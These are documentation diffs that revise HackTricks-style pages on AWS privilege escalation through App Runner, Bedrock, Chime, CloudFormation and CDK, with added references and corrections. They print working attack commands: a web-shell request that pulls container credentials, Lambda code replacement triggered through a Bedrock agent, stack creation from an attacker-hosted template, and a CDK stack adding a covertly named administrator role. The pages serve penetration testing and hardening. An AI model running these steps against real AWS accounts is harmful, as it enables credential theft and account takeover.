+Next, the attacker creates an AppRunner service configured with this web shell image and the IAM Role they want to exploit. The `CreateService` API accepts an `ECR_PUBLIC` image repository and an `InstanceRoleArn` in the instance configuration.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 aws apprunner create-service \
@@ -69,12 +69,21 @@ aws apprunner create-service \
     --query Service.ServiceUrl
 ```
 
-After waiting for the service creation to complete, use the web shell to retrieve container credentials and obtain the permissions of the IAM Role attached to AppRunner.
+After waiting for the asynchronous service creation to complete, use the web shell to retrieve container credentials and obtain the permissions of the IAM Role attached to AppRunner. The container credential provider appends `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` to `169.254.170.2`, and App Runner research has demonstrated retrieving the attached role's temporary credentials this way.<sup>[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```sh
 curl 'https://<service-url>/?cmd=curl+http%3A%2F%2F169.254.170.2%24AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
 ```
 
-**Potential Impact:** Direct privilege escalation to any IAM role that can be attached to AppRunner services.
+**Potential Impact:** Direct privilege escalation to the effective permissions of any IAM role that can be passed to and attached to an AppRunner service.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
+
+## References
+
+- [1] [How App Runner works with IAM](https://docs.aws.amazon.com/apprunner/latest/dg/security_iam_service-with-iam.html)
+- [2] [Grant a user permissions to pass a role to an AWS service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [3] [CreateService - AWS App Runner](https://docs.aws.amazon.com/apprunner/latest/api/API_CreateService.html)
+- [4] [Moving an image through its lifecycle in Amazon ECR Public](https://docs.aws.amazon.com/AmazonECR/latest/public/getting-started-cli.html)
+- [5] [Container credential provider - AWS SDKs and Tools](https://docs.aws.amazon.com/sdkref/latest/guide/feature-container-credentials.html)
+- [6] [Getting shell and data access in AWS App Runner](https://appsecco.com/blog/getting-shell-and-data-access-in-aws-app-runner)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
@@ -1,39 +1,39 @@
 # AWS - Bedrock PrivEsc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Amazon Bedrock AgentCore
 
 ### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
 
-AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that “provides permissions for the code interpreter to access AWS services”.
+AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that provides permissions for the code interpreter to access AWS services.<sup>[[3]](#references)</sup>
 
-If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution role’s permissions** (lateral movement / privilege escalation depending on role scope).
+If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution role’s permissions** (lateral movement / privilege escalation depending on role scope).<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
 
 > [!NOTE]
-> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access).
-> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke.
+> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access).<sup>[[1]](#references)[[6]](#references)</sup>
+> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke.<sup>[[6]](#references)</sup>
 
 #### Preconditions (common misconfiguration)
 
-- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
-- A user (developer/auditor/CI identity) has permissions to:
+- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[6]](#references)</sup>
+- A user (developer/auditor/CI identity) has permissions to:<sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
   - start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
   - invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
-- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (lets them create a new interpreter configured with an execution role, depending on org guardrails).
+- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (lets them create a new interpreter configured with an execution role, depending on org guardrails).<sup>[[1]](#references)[[3]](#references)</sup>
 
 #### Recon (identify custom interpreters and execution role usage)
 
-List interpreters (control-plane) and inspect their configuration:
+List interpreters (control-plane) and inspect their configuration; the `get` response includes the configured execution role ARN.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 aws bedrock-agentcore-control list-code-interpreters
 aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
 ```
 
-> The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have.
+> The create-code-interpreter command supports `--execution-role-arn`, which defines what AWS permissions the interpreter will have.<sup>[[3]](#references)</sup>
 
 #### Step 1 - Start a session (this returns a `sessionId`, not an interactive shell)
+
+`StartCodeInterpreterSession` creates the session, while `InvokeCodeInterpreter` is the separate operation that executes code and returns a result stream.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 SESSION_ID=$(
@@ -49,9 +49,9 @@ echo "SessionId: $SESSION_ID"
 
 #### Step 2 - Invoke code execution (Boto3 or signed HTTPS)
 
-There is **no interactive python shell** from `start-code-interpreter-session`. Execution happens via **InvokeCodeInterpreter**.
+There is **no interactive python shell** from `start-code-interpreter-session`. Execution happens via **InvokeCodeInterpreter**.<sup>[[4]](#references)[[5]](#references)</sup>
 
-**Option A - Boto3 example (execute Python + verify identity):**
+**Option A - Boto3 example (execute Python + verify identity):**<sup>[[5]](#references)</sup>
 
 ```python
 import boto3
@@ -74,9 +74,9 @@ for event in resp.get("stream", []):
     print(event)
 ```
 
-If the interpreter is configured with an execution role, the `sts:GetCallerIdentity()` output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot.
+When the interpreter can reach STS (for example, in `PUBLIC` network mode) and is configured with an execution role, the `sts:GetCallerIdentity()` output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot.<sup>[[1]](#references)[[6]](#references)</sup>
 
-**Option B - Signed HTTPS call (awscurl):**
+**Option B - Signed HTTPS call (awscurl):**<sup>[[5]](#references)</sup>
 
 ```bash
 awscurl -X POST \
@@ -97,38 +97,40 @@ awscurl -X POST \
 
 #### Impact
 
-* **Lateral movement** into whatever AWS access the interpreter execution role has.
-* **Privilege escalation** if the interpreter execution role is more privileged than the caller.
-* Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).
+* **Lateral movement** into whatever AWS access the interpreter execution role has.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
+* **Privilege escalation** if the interpreter execution role is more privileged than the caller.<sup>[[1]](#references)[[6]](#references)</sup>
+* Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).<sup>[[1]](#references)[[2]](#references)</sup>
 
 #### Mitigations / Hardening
 
-* **Least privilege** on the interpreter `executionRoleArn` (treat it like Lambda execution roles / CI roles).
-* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) and who can start sessions.
-* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
-* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation.
+* **Least privilege** on the interpreter `executionRoleArn` (treat it like Lambda execution roles / CI roles).<sup>[[6]](#references)</sup>
+* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) and who can start sessions.<sup>[[1]](#references)[[6]](#references)</sup>
+* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).<sup>[[1]](#references)</sup>
+* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Amazon Bedrock Agents
 
+Amazon Bedrock Agents is now Amazon Bedrock Agents Classic and is no longer open to new customers; this technique applies to existing agents.<sup>[[10]](#references)</sup>
+
 ### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
 
-Bedrock Agents can use **Lambda-backed action groups** as tools (external execution). If a principal can **modify the code of a Lambda function used by an agent**, and can then **invoke the agent**, they can execute attacker-controlled code under the **Lambda execution role**.
+Bedrock Agents can use **Lambda-backed action groups** as tools (external execution). If a principal can **modify the code of a Lambda function used by an agent**, and can then **invoke the agent**, they can execute attacker-controlled code under the **Lambda execution role**.<sup>[[7]](#references)[[10]](#references)[[11]](#references)[[13]](#references)[[14]](#references)</sup>
 
 > [!NOTE]
-> This is a **cross-service trust abuse** (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.
+> This is a **cross-service trust abuse** (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.<sup>[[10]](#references)[[11]](#references)[[20]](#references)</sup>
 
 #### Preconditions (common misconfiguration)
 
-- A Bedrock Agent exists with an **action group backed by a Lambda function**
+- A Bedrock Agent exists with an **action group backed by a Lambda function**.<sup>[[10]](#references)[[11]](#references)</sup>
 - The attacker has:
-  - `lambda:UpdateFunctionCode`
-  - `bedrock:InvokeAgent`
-- The Lambda execution role has broader permissions than the attacker
-- The attacker can identify the Lambda used by the agent
+  - `lambda:UpdateFunctionCode`<sup>[[13]](#references)</sup>
+  - `bedrock:InvokeAgent`<sup>[[15]](#references)</sup>
+- The Lambda execution role has broader permissions than the attacker.<sup>[[14]](#references)</sup>
+- The attacker can identify the Lambda used by the agent.<sup>[[11]](#references)[[12]](#references)</sup>
 
 #### Recon
 
-Enumerate agent action groups:
+Enumerate agent action groups and read the Lambda ARN from the action-group configuration.<sup>[[10]](#references)[[11]](#references)[[18]](#references)</sup>
 
 ```bash
 aws bedrock-agent list-agents
@@ -136,7 +138,7 @@ aws bedrock-agent get-agent --agent-id <AGENT_ID>
 aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
 ```
 
-Inspect Lambda:
+Inspect Lambda configuration, including its execution-role ARN:<sup>[[12]](#references)</sup>
 
 ```bash
 aws lambda get-function --function-name <FUNCTION_NAME>
@@ -144,7 +146,7 @@ aws lambda get-function --function-name <FUNCTION_NAME>
 
 #### Exploitation
 
-Replace Lambda code:
+Replace the unpublished Lambda function code; `UpdateFunctionCode` accepts a ZIP deployment package for ZIP-based functions.<sup>[[13]](#references)</sup>
 
 ```bash
 zip payload.zip lambda_function.py
@@ -154,48 +156,85 @@ aws lambda update-function-code \
   --zip-file fileb://payload.zip
 ```
 
-Example payload:
+Example payload for an action group defined with function details (the response must use Bedrock’s action-group envelope):<sup>[[19]](#references)</sup>
+
+```python
+import json
+import boto3
+
+def lambda_handler(event, context):
+    identity = boto3.client("sts").get_caller_identity()
+
+    return {
+        "messageVersion": "1.0",
+        "response": {
+            "actionGroup": event["actionGroup"],
+            "function": event["function"],
+            "functionResponse": {
+                "responseBody": {
+                    "TEXT": {"body": json.dumps(identity)}
+                }
+            }
+        },
+        "sessionAttributes": event.get("sessionAttributes", {}),
+        "promptSessionAttributes": event.get("promptSessionAttributes", {})
+    }
+```
+
+Trigger via the agent. The AWS CLI does not support the streaming `InvokeAgent` operation, so use an SDK such as Boto3:<sup>[[16]](#references)[[17]](#references)[[21]](#references)</sup>
 
 ```python
 import boto3
 
-def lambda_handler(event, context):
-    return boto3.client("sts").get_caller_identity()
-```
+client = boto3.client("bedrock-agent-runtime", region_name="<REGION>")
+response = client.invoke_agent(
+    agentId="<AGENT_ID>",
+    agentAliasId="<ALIAS_ID>",
+    sessionId="test",
+    inputText="trigger tool"
+)
 
-Trigger via agent:
-
-```bash
-aws bedrock-agent-runtime invoke-agent \
-  --agent-id <AGENT_ID> \
-  --agent-alias-id <ALIAS_ID> \
-  --session-id test \
-  --input-text "trigger tool"
+for event in response.get("completion", []):
+    if "chunk" in event:
+        print(event["chunk"]["bytes"].decode(), end="")
 ```
 
 #### Impact
 
-* **Privilege escalation** into Lambda execution role
-* **Data exfiltration** from AWS services
-* **Cross-service abuse** via trusted agent execution
+* **Privilege escalation** into Lambda execution role.<sup>[[13]](#references)[[14]](#references)</sup>
+* **Data exfiltration** from AWS services.<sup>[[14]](#references)</sup>
+* **Cross-service abuse** via trusted agent execution.<sup>[[10]](#references)[[11]](#references)[[20]](#references)</sup>
 
 #### Mitigations
 
-* **Restrict** `lambda:UpdateFunctionCode`
-* Use **least-privilege** Lambda roles
+* **Restrict** `lambda:UpdateFunctionCode`<sup>[[13]](#references)</sup>
+* Use **least-privilege** Lambda roles.<sup>[[14]](#references)</sup>
 * **Monitor** Lambda code changes
 * **Audit** Bedrock agent tool usage
 
 ## References
 
-- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
-- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/)
-- [AWS CLI: create-code-interpreter (`--execution-role-arn`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html)
-- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
-- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
-- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
-- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
+- [1] [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
+- [2] [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/)
+- [3] [AWS CLI: create-code-interpreter (`--execution-role-arn`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html)
+- [4] [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
+- [5] [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
+- [6] [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
+- [7] [Software Secured: AWS Privilege Escalation, IAM Risks, Service-Based Attacks and AI-Driven Bedrock AgentCore Vectors](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
+- [8] [AWS CLI: list-code-interpreters](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/list-code-interpreters.html)
+- [9] [AWS CLI: get-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/get-code-interpreter.html)
+- [10] [AWS Dev Guide: How Amazon Bedrock Agents works](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-how.html)
+- [11] [AWS API Reference: AgentActionGroup](https://docs.aws.amazon.com/bedrock/latest/APIReference/API_agent_AgentActionGroup.html)
+- [12] [AWS CLI: get-function](https://docs.aws.amazon.com/cli/latest/reference/lambda/get-function.html)
+- [13] [AWS CLI: update-function-code](https://docs.aws.amazon.com/cli/latest/reference/lambda/update-function-code.html)
+- [14] [AWS Lambda Developer Guide: Defining Lambda function permissions with an execution role](https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html)
+- [15] [AWS IAM: Identity-based policy examples for Amazon Bedrock Agents](https://docs.aws.amazon.com/bedrock/latest/userguide/security_iam_id-based-policy-examples-agent.html)
+- [16] [AWS Dev Guide: Invoke an agent from your application](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-invoke-agent.html)
+- [17] [Boto3 API Reference: invoke_agent](https://docs.aws.amazon.com/boto3/latest/reference/services/bedrock-agent-runtime/client/invoke_agent.html)
+- [18] [AWS CLI: list-agent-action-groups](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agent/list-agent-action-groups.html)
+- [19] [AWS Dev Guide: Configure Lambda functions for Amazon Bedrock agents](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html)
+- [20] [AWS Dev Guide: Create a service role for Amazon Bedrock Agents](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-permissions.html)
+- [21] [AWS API Reference: InvokeAgent](https://docs.aws.amazon.com/bedrock/latest/APIReference/API_agent-runtime_InvokeAgent.html)
 
 
 {{#include ../../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc/README.md
@@ -1,13 +1,20 @@
 # AWS - Chime Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ### chime:CreateApiKey
+
+The `chime:CreateApiKey` IAM action is a write permission that creates a SCIM access key for an Amazon Chime account and its Okta configuration.<sup>[[1]](#references)</sup>
+
+> [!WARNING]
+> AWS ended support for the Amazon Chime service on February 20, 2026; the separate Amazon Chime SDK is unaffected. Treat this legacy entry as historical rather than as a current Chime SDK privilege-escalation path.<sup>[[2]](#references)</sup>
 
 TODO
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [Actions, resources, and condition keys for Amazon Chime](https://docs.aws.amazon.com/service-authorization/latest/reference/list_chime.html)
+- [2] [Guide to Amazon Chime transition features](https://docs.aws.amazon.com/chime/latest/ag/amazon-chime-transition-features.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Cloudformation Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## cloudformation
 
 For more information about cloudformation check:
@@ -12,12 +10,13 @@ For more information about cloudformation check:
 
 ### `iam:PassRole`, `cloudformation:CreateStack`
 
-An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:**
+An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template to **execute actions under the permissions of a specified role**. CloudFormation uses the supplied role as a service role, and the current API requires a template URL in Amazon S3 or a Systems Manager document; S3 template URLs must use HTTPS.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 aws cloudformation create-stack --stack-name <stack-name> \
-    --template-url http://attacker.com/attackers.template \
-    --role-arn <arn-role>
+    --template-url https://attacker-bucket.s3.amazonaws.com/attackers.template \
+    --role-arn <arn-role> \
+    --capabilities CAPABILITY_IAM
 ```
 
 In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**:
@@ -26,36 +25,36 @@ In the following page you have an **exploitation example** with the additional p
 iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
 {{#endref}}
 
-**Potential Impact:** Privesc to the cloudformation service role specified.
+**Potential Impact:** Privesc to the CloudFormation service role specified.<sup>[[1]](#references)[[3]](#references)</sup>
 
-### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)
+### `iam:PassRole`, `cloudformation:UpdateStack` (and, where needed, `cloudformation:SetStackPolicy`)
 
-In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario:
+In this case you can **abuse an existing CloudFormation stack** to update it and escalate privileges as in the previous scenario. The role supplied to `UpdateStack` becomes the stack's service role for future operations; a principal that can operate on the stack can use that role even without `iam:PassRole` after it is attached.<sup>[[3]](#references)[[5]](#references)</sup>
 
 ```bash
 aws cloudformation update-stack \
     --stack-name privesc \
     --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
+    --role-arn arn:aws:iam::123456789012:role/CloudFormationAdmin2 \
     --capabilities CAPABILITY_IAM \
     --region eu-west-1
 ```
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
+The `cloudformation:SetStackPolicy` permission can change the resource-update guardrail, but a stack policy is not an IAM policy and cannot grant `cloudformation:UpdateStack`. If the caller already has `UpdateStack`, `SetStackPolicy` can remove resource-level update restrictions or provide a temporary override during the update.<sup>[[6]](#references)[[7]](#references)</sup>
 
-**Potential Impact:** Privesc to the cloudformation service role specified.
+**Potential Impact:** Privesc to the CloudFormation service role specified.<sup>[[3]](#references)[[5]](#references)</sup>
 
-### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`
+### `cloudformation:UpdateStack` (and, where needed, `cloudformation:SetStackPolicy`)
 
-If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update).
+If you have `cloudformation:UpdateStack` but **no `iam:PassRole`**, you can still **update the stacks** used and abuse the **IAM roles they have already attached**. Check the previous section for the exploit example, but omit the role from the update so CloudFormation reuses the role already associated with the stack.<sup>[[3]](#references)[[5]](#references)</sup>
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
+The `cloudformation:SetStackPolicy` permission can change the stack policy to allow resource updates, but it does not grant the IAM `UpdateStack` permission; that IAM permission is still required.<sup>[[6]](#references)[[7]](#references)</sup>
 
-**Potential Impact:** Privesc to the cloudformation service role already attached.
+**Potential Impact:** Privesc to the CloudFormation service role already attached.<sup>[[3]](#references)[[5]](#references)</sup>
 
-### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
+### `iam:PassRole`, `cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet` (and, where needed, `cloudformation:SetStackPolicy`)
 
-An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack.
+An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new CloudFormation stack and abuse the CloudFormation service role** just like with `CreateStack` or `UpdateStack`. `CreateChangeSet` accepts the role that CloudFormation assumes when executing the change set and for later stack operations.<sup>[[3]](#references)[[8]](#references)</sup>
 
 The following exploit is a **variation of the**[ **CreateStack one**](#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack.
 
@@ -65,7 +64,7 @@ aws cloudformation create-change-set \
     --change-set-name privesc \
     --change-set-type CREATE \
     --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::947247140022:role/CloudFormationAdmin \
+    --role-arn arn:aws:iam::123456789012:role/CloudFormationAdmin \
     --capabilities CAPABILITY_IAM \
     --region eu-west-1
 
@@ -85,47 +84,47 @@ aws cloudformation describe-stacks \
     --region eu-west-1
 ```
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack.
+The `cloudformation:SetStackPolicy` permission does not grant `CreateChangeSet` or `ExecuteChangeSet`; if a stack policy blocks resource updates, it can modify that guardrail, but the corresponding IAM permissions are still required.<sup>[[6]](#references)[[7]](#references)[[9]](#references)</sup>
 
-**Potential Impact:** Privesc to cloudformation service roles.
+**Potential Impact:** Privesc to CloudFormation service roles.<sup>[[3]](#references)[[8]](#references)[[9]](#references)</sup>
 
-### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
+### `cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet` (and, where needed, `cloudformation:SetStackPolicy`)
 
-This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter:
+This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**. For an existing stack, an update change set uses that stack's service role; just modify the parameter:
 
 ```
 --change-set-type UPDATE
 ```
 
-**Potential Impact:** Privesc to the cloudformation service role already attached.
+**Potential Impact:** Privesc to the CloudFormation service role already attached.<sup>[[3]](#references)[[8]](#references)[[9]](#references)</sup>
 
-### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)
+### `iam:PassRole`, (`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)
 
-An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.
+For self-managed StackSets, an attacker could abuse these permissions to create or update StackSets while passing a customized administration role and using an execution role in target accounts. Creating a new StackSet only creates the container; `cloudformation:CreateStackInstances` is also required to deploy its initial stack instances.<sup>[[10]](#references)[[12]](#references)[[13]](#references)</sup>
 
-**Potential Impact:** Privesc to cloudformation service roles.
+**Potential Impact:** Privesc to CloudFormation service roles in the accounts and Regions the StackSet can target.<sup>[[10]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ### `cloudformation:UpdateStackSet`
 
-An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.
+An attacker could abuse this permission without `iam:PassRole` to update an existing StackSet using the execution role already associated with it, provided the caller can operate on that StackSet. Template changes propagate to the associated stack instances.<sup>[[11]](#references)[[13]](#references)</sup>
 
-**Potential Impact:** Privesc to the attached cloudformation roles.
+**Potential Impact:** Privesc to the attached CloudFormation roles.<sup>[[11]](#references)[[13]](#references)</sup>
 
 ## AWS CDK
 
-The AWS cdk is a toolkit for allowing users to define their infrastructure-as-code in languages they are already familiar with, as well as easily re-using sections. The CDK then converts the high-level code (ie python) into Cloudformation templates (yaml or json).
+The AWS CDK is a toolkit for defining cloud infrastructure in code, composing reusable constructs, and provisioning it through AWS CloudFormation. It supports general-purpose languages such as Python and synthesizes the high-level code into CloudFormation templates (YAML or JSON).<sup>[[14]](#references)[[15]](#references)</sup>
 
-In order to use the CDK, an administrative user must first bootstrap the account, which create several IAM roles, including the *exec role*, which has \*/\* permissions. These roles follow the naming structure `cdk-<qualifier>-<name>-<account-id>-<region>`. Bootstrapping must be done once per region per account.
+In order to use the CDK, an administrative user must first bootstrap each account and Region before deployment. Modern bootstrapping creates several IAM roles, including the `CloudFormationExecutionRole`; by default it has `AdministratorAccess` unless execution policies or trust settings change that behavior. These roles follow the naming structure `cdk-<qualifier>-<name>-<account-id>-<region>`, and the default qualifier is `hnb659fds` (it can be customized).<sup>[[2]](#references)[[15]](#references)[[17]](#references)</sup>
 
-By default, CDK users do not have access to list the roles needed to use the CDK, meaning that you will need to determine them manually. If you compromise a developers machine or some CI/CD node, these roles can can be assumed to grant yourself the ability to deploy CFN templates, using the `cfn-exec` role to allow CFN to deploy any resources, fully compromising the account.
+CDK deployments use the bootstrapped roles: the deployment identity assumes `DeploymentActionRole` and passes `CloudFormationExecutionRole`, which determines what CloudFormation can do. If a developer machine or CI/CD node is compromised and its credentials can assume the deployment role, an attacker may be able to deploy templates with the execution role's permissions.<sup>[[2]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 ### Determining the role names
 
-If you have `cloudformation:DescribeStacks`, the roles are defined in a stack called `CDKToolkit`, and you can pull the names from there.
+If you have `cloudformation:DescribeStacks`, use it to confirm whether the default bootstrap stack, `CDKToolkit`, exists. To recover individual role names, read the stack's resources or template where your permissions allow, or use the deterministic names in the bootstrap template.<sup>[[2]](#references)[[15]](#references)</sup>
 
-If you're on a machine that has been used to build and deploy CDK projects, you can pull them from `cdk.out/manafest.json` in the projects root directory.
+If you're on a machine that has been used to build and deploy CDK projects, you can pull role metadata from `cdk.out/manifest.json` in the project's root directory; the cloud assembly schema includes fields such as `cloudFormationExecutionRoleArn`.<sup>[[18]](#references)</sup>
 
-You can also make a good guess on what they are. `qualifier` is a string added to the roles allowing for multiple instance of the CDK bootstrap to be deployed at once, however the default value is hard-coded to `hnb659fds`. 
+You can also make a good guess on what they are. `qualifier` is a string added to the roles, allowing multiple instances of the CDK bootstrap to be deployed at once; the default value is `hnb659fds`, but it is configurable.<sup>[[2]](#references)[[15]](#references)</sup>
 
 ```
 # Defaults
@@ -152,7 +151,7 @@ class CdkTestStack(Stack):
         role = iam.Role(
             self,
             "cdk-backup-role", # Role name, make it something subtle
-            assumed_by=iam.AccountPrincipal("1234567890"), # Account to allow to assume the role
+            assumed_by=iam.AccountPrincipal("123456789012"), # Account to allow to assume the role
             managed_policies=[
                 iam.ManagedPolicy.from_aws_managed_policy_name("AdministratorAccess") # Policies to attach, in this case AdministratorAccess
             ],
@@ -161,10 +160,24 @@ class CdkTestStack(Stack):
 
 ## References
 
